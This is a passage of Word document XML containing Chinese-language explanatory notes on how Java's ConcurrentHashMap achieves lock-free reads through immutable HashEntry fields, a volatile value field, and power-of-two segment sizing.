          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(Immutable)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>和易变</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(Volatile)</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ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>完全允许多个读操作并发进行，读操作并不需要加锁。如果使用传统的技术，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的实现，如果允许可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的中间添加或删除元素，读操作不加锁将得到不一致的数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现技术是保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>几乎是不可变的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>代表每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链中的一个节点，其结构如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>static</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final</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> HashEntry&lt;K,V&gt; {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> K key;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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final</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> V value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> HashEntry&lt;K,V&gt; next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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可以看到除了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，其它值都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，这意味着不能从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的中间或尾部添加或删除节点，因为这需要修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>引用值，所有的节点的修改只能从头部开始。</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作，可以一律添加到</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链的头部。但是对于</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2618">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作，可能需要从中间删除一个节点，这就需要将要删除节点的前面所有节点整个复制一遍，最后一个节点指向要删除结点的下一个结点。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>这在讲解删除操作时还会详述。</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>为了确保读操作能够看到最新的值，将</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>设置成</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这避免了加锁</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</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br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>其它</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为了加快定位段以及段中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>槽的速度，每个段</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>槽的的个数都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2^n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这使得通过位运算就可以定位段和段中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>槽的位置。当并发级别为默认值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>时，也就是段的个数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值的高</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>位决定分配在哪个段中。但是我们也不要忘记《算法导论》给我们的教训：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>槽的的个数不应该是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2^n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这可能导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>槽分配不均，这需要对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值重新再</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一次。（这段似乎有点多余了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="180975" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="17" name="图片 3" descr="http://www.iteye.com/images/smiles/icon_sa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iteye.com/images/smiles/icon_sad.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="180975" cy="180975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
